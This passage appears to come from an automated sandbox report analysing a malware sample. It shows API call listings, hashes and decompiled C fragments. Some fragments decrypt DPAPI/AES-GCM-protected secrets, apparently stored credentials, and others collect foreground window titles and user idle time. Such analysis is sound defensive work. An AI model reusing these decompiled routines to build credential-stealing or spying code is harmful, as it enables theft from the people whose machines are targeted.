                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 02D1D288
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                                                    • String ID:
                                                                    • API String ID: 4195813003-0
                                                                    • Opcode ID: 7daea5e846a5013abf04bdac95a12fdce0f12efe083f19e181778970066c7c49
                                                                    • Instruction ID: 1a46285d1bbacb7b291304c718d5263f3d6138f26ef98469704e35f56b69aae6
                                                                    • Opcode Fuzzy Hash: 7daea5e846a5013abf04bdac95a12fdce0f12efe083f19e181778970066c7c49
                                                                    • Instruction Fuzzy Hash: E031BB71600516BBE709EB70EC54FAAB7AEFF14310F504615E52992680EB70BD54CFB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040ED6E Relevance: 6.3, APIs: 4, Instructions: 311COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: a16edf3c91191aa68e022936d977b1455e684d57e6da197037ec389aec64b2b4
                                                                    • Instruction ID: e47121bc920ff3f7ea77ed45393016d2120011e0314bd2c617fe874b5558f5bf
                                                                    • Opcode Fuzzy Hash: a16edf3c91191aa68e022936d977b1455e684d57e6da197037ec389aec64b2b4
                                                                    • Instruction Fuzzy Hash: 6CB1467190424AAFDB218F19C8817AFBBB1EF45314F1445BAE544BB3C2C23C9D91C7A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402E90 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000), ref: 00402F28
                                                                    • FindResourceW.KERNEL32(00000000,?,00000006), ref: 00402F6E
                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 00402FD5
                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001), ref: 00403007
                                                                      • Part of subcall function 0040731A: RtlEnterCriticalSection.NTDLL(0054C004), ref: 00407325
                                                                      • Part of subcall function 0040731A: RtlLeaveCriticalSection.NTDLL(0054C004), ref: 00407351
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharCriticalFindMultiResourceSectionWide$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 2462052736-0
                                                                    • Opcode ID: 86cd49adf2e7b3b36c0f573bb7070bc4e31e72454729bce8d5d3bf8b9874ccc5
                                                                    • Instruction ID: c3cda8ed44ac57988993c33555f7e647619e1c5fd610c54cf0df41b08251db79
                                                                    • Opcode Fuzzy Hash: 86cd49adf2e7b3b36c0f573bb7070bc4e31e72454729bce8d5d3bf8b9874ccc5
                                                                    • Instruction Fuzzy Hash: 9951EF31600205AFE710DF29C848B2ABBE9EF84715F10417EF955EB3D5DB799A018B68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040604A Relevance: 6.2, APIs: 4, Instructions: 173registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VarUI4FromStr.OLEAUT32(?,00000000,00000000,?), ref: 0040611E
                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 004061D0
                                                                    • RegCloseKey.ADVAPI32 ref: 00406208
                                                                      • Part of subcall function 0040AA43: _free.LIBCMT ref: 0040AA56
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?), ref: 004063C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Close$FromValue_free
                                                                    • String ID:
                                                                    • API String ID: 2478416592-0
                                                                    • Opcode ID: 4a75d6c256a12b52d26b5594e4c4df3c51f64240cfad6737815bc7a2d4af5771
                                                                    • Instruction ID: 783e4a32be8d04131a6d3b5aa6c25d0e8a5fdb5090801ca485d60173d56b3ea8
                                                                    • Opcode Fuzzy Hash: 4a75d6c256a12b52d26b5594e4c4df3c51f64240cfad6737815bc7a2d4af5771
                                                                    • Instruction Fuzzy Hash: 3A7141F1E002288BDB60DF15CD80B9AB7B9AF84304F0541EEEA0A77291DB745E94CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404D70 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,80004005,?,?,00000000,00000000,?,?,?,?,?,80004005,?,80004005), ref: 00404E30
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,80004005,?,80004005,?,00000003,?,00000000), ref: 00404E41
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,80004005,00000000,00000000,00000000,00000000,?,?,?,?,?,80004005,?,80004005), ref: 00404E60
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,80004005,?,00000000,00000000,00000000,?,?,?,80004005,?,80004005,?,00000003), ref: 00404E8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1717984340-0
                                                                    • Opcode ID: d6f31bbd231b6a6888e700c09dff859c0ac281d32c646bf8a3ea4c558b503ce0
                                                                    • Instruction ID: 007fd4862d0c4b9111d363751063929c5d67b2fe23cf5da8ca229cd0ef8e736b
                                                                    • Opcode Fuzzy Hash: d6f31bbd231b6a6888e700c09dff859c0ac281d32c646bf8a3ea4c558b503ce0
                                                                    • Instruction Fuzzy Hash: A04109B1640205BBEB205F65DC41FAB7B19FF40744F20413AFA05B92C0DB7AAD248BD9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1F69F Relevance: 6.1, APIs: 4, Instructions: 54libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1F69F(WCHAR** __ecx, intOrPtr* __edx) {
				struct HRSRC__* _t13;
				void* _t14;
				unsigned int _t32;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;

				_t35 = __edx;
				_t36 = LoadLibraryExW( *__ecx, 0, 2);
				if(_t36 == 0xffffffff) {
					L4:
					return 0;
				}
				_t13 = FindResourceW(_t36, 1, 0x10);
				if(_t13 == 0) {
					goto L4;
				}
				_t14 = LoadResource(_t36, _t13);
				if(_t14 == 0) {
					goto L4;
				}
				_t32 =  *(_t14 + 0x28);
				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
				 *(_t35 + 8) = _t32 & 1;
				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
				FreeLibrary(_t36);
				return 1;
			}








                                                                    0x02d1f6a8
                                                                    0x02d1f6b0
                                                                    0x02d1f6b5
                                                                    0x02d1f719
                                                                    0x00000000
                                                                    0x02d1f719
                                                                    0x02d1f6be
                                                                    0x02d1f6c6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1f6ca
                                                                    0x02d1f6d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1f6d7
                                                                    0x02d1f6da
                                                                    0x02d1f6e0
                                                                    0x02d1f6ec
                                                                    0x02d1f6f0
                                                                    0x02d1f705
                                                                    0x02d1f709
                                                                    0x02d1f70c
                                                                    0x02d1f70f
                                                                    0x00000000

                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,02D1DCAA), ref: 02D1F6AA
                                                                    • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,02D1DCAA), ref: 02D1F6BE
                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,02D1DCAA), ref: 02D1F6CA
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,02D1DCAA), ref: 02D1F70F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoadResource$FindFree
                                                                    • String ID:
                                                                    • API String ID: 3272429154-0
                                                                    • Opcode ID: b7ed6fa33afb4b19fc76bc887c599d9290175f3f0fd15641da219473a421eef1
                                                                    • Instruction ID: b90911f1d1c36331c08e1e781a3d59d9e33a09787912a309812adca2a973015a
                                                                    • Opcode Fuzzy Hash: b7ed6fa33afb4b19fc76bc887c599d9290175f3f0fd15641da219473a421eef1
                                                                    • Instruction Fuzzy Hash: 5101D6B5744A11AFD3144F25EC85B66B7B4FF583147058638E829C3790D770DC15C7A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1C9F2 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 65%
                                                                    			E02D1C9F2(void* __ecx, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v16;
				void* _t16;
				void* _t19;
				void* _t34;
				void* _t35;

				_t35 = 0;
				_t16 = E02D1CC54(__ecx,  &_v12,  &_v8);
				_pop(_t26);
				if(_t16 == 0) {
					L8:
					return _t35;
				}
				_t34 = _v12;
				if(_v8 >= 5) {
					_t19 = E02D11000(_t34, "DPAPI", 5);
					_t42 = _t19;
					if(_t19 == 0) {
						_push( &_v16);
						_push( &_v12);
						if(E02D1CA78(_t34 + 5, _v8 - 5, _t42) != 0) {
							if(_v16 == 0x20) {
								_t35 = E02D1CCB4(_t22, _v12, _a8, _a12);
							}
							LocalFree(_v12);
						}
					}
				}
				LocalFree(_t34);
				goto L8;
			}










                                                                    0x02d1ca01
                                                                    0x02d1ca03
                                                                    0x02d1ca08
                                                                    0x02d1ca0b
                                                                    0x02d1ca73
                                                                    0x02d1ca77
                                                                    0x02d1ca77
                                                                    0x02d1ca11
                                                                    0x02d1ca14
                                                                    0x02d1ca1e
                                                                    0x02d1ca26
                                                                    0x02d1ca28
                                                                    0x02d1ca31
                                                                    0x02d1ca35
                                                                    0x02d1ca49
                                                                    0x02d1ca4f
                                                                    0x02d1ca60
                                                                    0x02d1ca60
                                                                    0x02d1ca65
                                                                    0x02d1ca65
                                                                    0x02d1ca49
                                                                    0x02d1ca28
                                                                    0x02d1ca6c
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 02D1CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC73
                                                                      • Part of subcall function 02D1CC54: LocalAlloc.KERNEL32(00000040,?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CC81
                                                                      • Part of subcall function 02D1CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC97
                                                                      • Part of subcall function 02D1CC54: LocalFree.KERNEL32(?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CCA5
                                                                    • LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 02D1CA6C
                                                                      • Part of subcall function 02D1CA78: GetLastError.KERNEL32 ref: 02D1CADE
                                                                    • LocalFree.KERNEL32(?), ref: 02D1CA65
                                                                      • Part of subcall function 02D1CCB4: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,02D1CA5F,?), ref: 02D1CCD1
                                                                      • Part of subcall function 02D1CCB4: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,02D1CA5F,?), ref: 02D1CCEA
                                                                      • Part of subcall function 02D1CCB4: BCryptGenerateSymmetricKey.BCRYPT(00000020,02D1CA5F,00000000,00000000,?,00000020,00000000,?,02D1CA5F,?), ref: 02D1CCFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
                                                                    • String ID: $DPAPI
                                                                    • API String ID: 379455710-1819349886
                                                                    • Opcode ID: 9a55507770247adcbe3e15b9953d5a9f77d2deb2057aa56ab3a0224b5e02c06b
                                                                    • Instruction ID: 450b53acbf01823e013e455dfa1cf9d1fa66b56fefa403c0fb8b66035deb8222
                                                                    • Opcode Fuzzy Hash: 9a55507770247adcbe3e15b9953d5a9f77d2deb2057aa56ab3a0224b5e02c06b
                                                                    • Instruction Fuzzy Hash: B601C472A40219BBCF11EBA0E945DDEB779EB44708F014166E800E2680E730EF45DBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D147EA Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 82%
                                                                    			E02D147EA(intOrPtr _a4) {
				char _v8;
				struct tagLASTINPUTINFO _v16;
				signed int _v36;
				char _v40;
				short _v552;

				_v16.cbSize = 8;
				GetLastInputInfo( &_v16);
				_t23 = GetTickCount() - _v16.dwTime;
				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
				E02D135E5( &_v8,  &_v552);
				_t12 =  &_v36;
				_v36 = _v36 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v40 = 0x15;
				asm("movups [ebp-0x1c], xmm0");
				E02D13679(E02D13761(E02D13740( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
				E02D13665( &_v40);
				E02D15EA5(_v8);
				return _a4;
			}








                                                                    0x02d147f7
                                                                    0x02d147ff
                                                                    0x02d1480b
                                                                    0x02d1482c
                                                                    0x02d1483c
                                                                    0x02d14844
                                                                    0x02d14844
                                                                    0x02d1484c
                                                                    0x02d1484f
                                                                    0x02d1485a
                                                                    0x02d1486c
                                                                    0x02d14874
                                                                    0x02d1487c
                                                                    0x02d14886

                                                                    APIs
                                                                    • GetLastInputInfo.USER32 ref: 02D147FF
                                                                    • GetTickCount.KERNEL32 ref: 02D14805
                                                                    • GetForegroundWindow.USER32 ref: 02D14819
                                                                    • GetWindowTextW.USER32 ref: 02D1482C
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                                                    • String ID:
                                                                    • API String ID: 2567647128-0
                                                                    • Opcode ID: 945a84fb3f01d7f5be3abe39b0dd489ebfb8e5db397fa903e5e1301107e36f8d
                                                                    • Instruction ID: 0c0a35220c75836e42c7f79dec2b3e0a9f3ab41aaac333764812f02321e46430
                                                                    • Opcode Fuzzy Hash: 945a84fb3f01d7f5be3abe39b0dd489ebfb8e5db397fa903e5e1301107e36f8d
                                                                    • Instruction Fuzzy Hash: B6111EB1D40208EBDB14EBA4E959ADDB7B9EF58305F014595E802B6280EF74AF58CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1EA89 Relevance: 6.0, APIs: 4, Instructions: 35threadsynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1EA89(void* __ecx) {
				void* _t14;
				long _t15;
				void** _t26;
				void* _t27;

				_t27 = __ecx;
				_t1 = _t27 + 0x14; // 0x2d2956c
				_t26 = _t1;
				if( *_t26 == 0) {
					L6:
					_t5 = _t27 + 0x10; // 0x2d29568
					E02D1EC8C(_t5);
					_t6 = _t27 + 4; // 0x2d2955c
					E02D1EC8C(_t6);
					_t7 = _t27 + 0xc; // 0x2d29564
					E02D1EC8C(_t7);
					_t8 = _t27 + 8; // 0x2d29560
					_t14 = E02D1EC8C(_t8);
					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
					return _t14;
				}
				_t15 = GetCurrentThreadId();
				_t2 = _t27 + 0x18; // 0x0
				if(_t15 ==  *_t2) {
					L5:
					E02D1EC8C(_t26);
					goto L6;
				}
				if( *(_t27 + 0x10) == 0) {
					return _t15;
				}
				_t4 = _t27 + 0x10; // 0x0
				SetEvent( *_t4);
				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
					TerminateThread( *_t26, 0xfffffffe);
				}
				goto L5;
			}







                                                                    0x02d1ea8a
                                                                    0x02d1ea8d
                                                                    0x02d1ea8d
                                                                    0x02d1ea93
                                                                    0x02d1ead4
                                                                    0x02d1ead4
                                                                    0x02d1ead7
                                                                    0x02d1eadc
                                                                    0x02d1eadf
                                                                    0x02d1eae4
                                                                    0x02d1eae7
                                                                    0x02d1eaec
                                                                    0x02d1eaef
                                                                    0x02d1eaf4
                                                                    0x00000000
                                                                    0x02d1eaf4
                                                                    0x02d1ea95
                                                                    0x02d1ea9b
                                                                    0x02d1ea9e
                                                                    0x02d1eacd
                                                                    0x02d1eacf
                                                                    0x00000000
                                                                    0x02d1eacf
                                                                    0x02d1eaa4
                                                                    0x02d1eafa
                                                                    0x02d1eafa
                                                                    0x02d1eaa6
                                                                    0x02d1eaa9
                                                                    0x02d1eac1
                                                                    0x02d1eac7
                                                                    0x02d1eac7
                                                                    0x00000000

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 02D1EA95
                                                                    • SetEvent.KERNEL32(00000000), ref: 02D1EAA9
                                                                    • WaitForSingleObject.KERNEL32(02D2956C,00001388), ref: 02D1EAB6
                                                                    • TerminateThread.KERNEL32(02D2956C,000000FE), ref: 02D1EAC7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                                                    • String ID:
                                                                    • API String ID: 2174867186-0
                                                                    • Opcode ID: 9fac2392becdd390e8250dd1342d572c5b72898574dab56d07a0a8afe12e15fe
                                                                    • Instruction ID: 1010c69391f398a0538f505cfca412e0a68825eeb0f8e3a106a93b1fb907612a
                                                                    • Opcode Fuzzy Hash: 9fac2392becdd390e8250dd1342d572c5b72898574dab56d07a0a8afe12e15fe
                                                                    • Instruction Fuzzy Hash: 36011D31504611EBD739AF10F948E99B7B3FF60311F610A29E85252EE0CBB06D98CE91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00416706 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,004152CA,00000000,00000001,00000000,00000000,?,00414646,00000000,0070F938,00000000), ref: 0041671D
                                                                    • GetLastError.KERNEL32(?,004152CA,00000000,00000001,00000000,00000000,?,00414646,00000000,0070F938,00000000,00000000,00000000,?,00414BC5,00420128), ref: 00416729
                                                                      • Part of subcall function 004166EF: CloseHandle.KERNEL32(FFFFFFFE,00416739,?,004152CA,00000000,00000001,00000000,00000000,?,00414646,00000000,0070F938,00000000,00000000,00000000), ref: 004166FF
                                                                    • ___initconout.LIBCMT ref: 00416739
                                                                      • Part of subcall function 004166B1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004166E0,004152B0,00000000,?,00414646,00000000,0070F938,00000000,00000000), ref: 004166C4
                                                                    • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,004152CA,00000000,00000001,00000000,00000000,?,00414646,00000000,0070F938,00000000,00000000), ref: 0041674E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 9b6803eefc5e9ebc6329461ebe9925345cbbf35a2184f21edf294b02da52e2af
                                                                    • Instruction ID: c7c3f7091c1e534a5099180d324dd9890964367d7e39adf498d0ec122441db0a
                                                                    • Opcode Fuzzy Hash: 9b6803eefc5e9ebc6329461ebe9925345cbbf35a2184f21edf294b02da52e2af
                                                                    • Instruction Fuzzy Hash: 74F0303A500128BBCF631F95EC049CE3F66FB193A5B014066FA1885130CB32C960EB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040CEE4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0040CEED
